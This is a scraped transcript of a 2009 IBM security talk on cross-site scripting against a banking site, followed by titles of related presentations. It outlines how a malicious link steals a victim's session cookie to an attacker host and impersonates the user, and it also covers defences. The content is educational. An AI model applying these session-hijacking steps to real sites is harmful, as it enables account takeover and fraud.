We think you have liked this presentation. If you wish to download it, please recommend it to your friends in any social system. Share buttons are a little bit lower. Thank you!
Presentation is loading. Please wait.
Published byTaniya Farabee
Modified over 2 years ago
© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research Group Manager OWASP IL
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Agenda Theoretical part: –Same Origin Policy 101 –Cross-Site Scripting 101 –HTTP sessions Practical part: –Trivial robbery –Advanced robbery
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Browser Scripting Capabilities What can scripts do: –Scripts can perform user interactions with the site –Scripts can seamlessly interact with the web site –Can perform any action that is related to the site –Can launch signed and safe ActiveX control
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Scripting Restrictions – Same Origin Policy What scripts can not do: –Scripts can only interact with the domain they came from –Scripts can see send and receive responses only from their domain –Scripts can access other browsers frames only from same domain –Scripts can issue requests to other domains (but not view the corresponding responses)
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Cross Site Scripting – The Exploit Process Evil.org TheBank.site User Script returned, executed by browser 3 User sends script embedded as data 2 1 Link to bank.com sent to user via E- mail or HTTPbank.com
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Cross Site Scripting – The Exploit Process Evil.org TheBank.site User Evil.orgEvil.org uses stolen session information to impersonate user 5 Script returned, executed by browser 3 User sends script embedded as data 2 1 Link to bank.com sent to user via E- mail or HTTPbank.com 4 Script sends users cookie and session information without the users consent or knowledge
© 2009 IBM Corporation IBM Rational Application Security Trivial Robbery Demo
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Demo Build payload Send malicious link to victim Retrieve the cookie and extract the session id Manually add session cookie to local browser Make a transaction
© 2009 IBM Corporation IBM Rational Application Security Advanced Robbery Demo
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Problems: The session id cookie is not enough HTTPOnly – Set-Cookie: = [; = ] [; expires= ][; domain= ] [; path= ][; secure][; HttpOnly] Pre-logon XSS
© 2009 IBM Corporation ILSL - IBM Israel Software Lab Problems: Key-logging is not enough Second factor authentication –Dongles –Client certificates Challenge on transaction –Security questions: What is your mom s maiden name? –Time-based challenge
© 2009 IBM Corporation ILSL - IBM Israel Software Lab ?
Web Security Nick Feamster CS 6262 Spring Cross-Site Scripting Overview 2 Attack Server Server Victim User Victim visit web site receive malicious.
IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 1 Active Man in the Middle Attacks The.
Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.
Cross-site Request Forgery (CSRF) Attacks Vijay Ganesh University of Waterloo Winter 2013.
Cookies Web Browser and Server use HTTP protocol to communicate and HTTP is a stateless protocol. But for a commercial website it is required to maintain.
EECS 354 Network Security Cross Site Scripting (XSS)
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Foundations of Network and Computer Security J J ohn Black CSCI 6268/TLEN 5550, Spring 2013.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
CSRF Attacks Daniel Chen 11/18/15. What is CSRF? Cross Site Request Forgery (Sea-Surf) AKA XSRF/ One Click / Sidejacking / Session Riding Exploits.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.
CookiesPHPMay-2007 : [‹#›] Maintaining State in PHP Part I - Cookies.
1 XSS Defense Past, Present and Future By Eoin Keary and Jim Manico March 2013 v3.
The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
A cookie is a piece of text that a Web server can store on a user's hard disk. Cookie data is simply name-value pairs stored on your hard disk by.
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Martin Kruliš by Martin Kruliš (v1.0)1.
More on web security Cookies Cross site scripting.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.
Web Application Vulnerabilities ECE 4112 Internetwork Security, Spring 2005 Chris Kelly Chris Lewis April 28, 2005 ECE 4112 Internetwork Security, Spring.
Client Side Vulnerabilities Aka, The Perils of HTTP Lesson 14.
©2009 Justin C. Klein Keane PHP Code Auditing Session 7 Sessions and Cookies Justin C. Klein Keane
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
SEC835 Prevent Cross-Site Scripting (XSS) attack.
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Cross-Site Attacks James Walden Northern Kentucky University.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Session Management A290/A590, Fall /25/2014.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
Week seven CIT 354 Internet II. 2 Objectives Database_Driven User Authentication Using Cookies Session Basics Summary Homework and Project 2.
Web Login, Cookies Web Login | Old way HTML
Cookie Same Origin Policy Dan Boneh CS 142 Winter 2009 Monday: session management using cookies.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS) Comes in several flavors: Stored Reflective DOM-Based.
Web Security Chapter 6. Learning Objectives Understand SSL/TLS protocols and their implementation on the Internet Understand HTTPS protocol as it relates.
© 2016 SlidePlayer.com Inc. All rights reserved.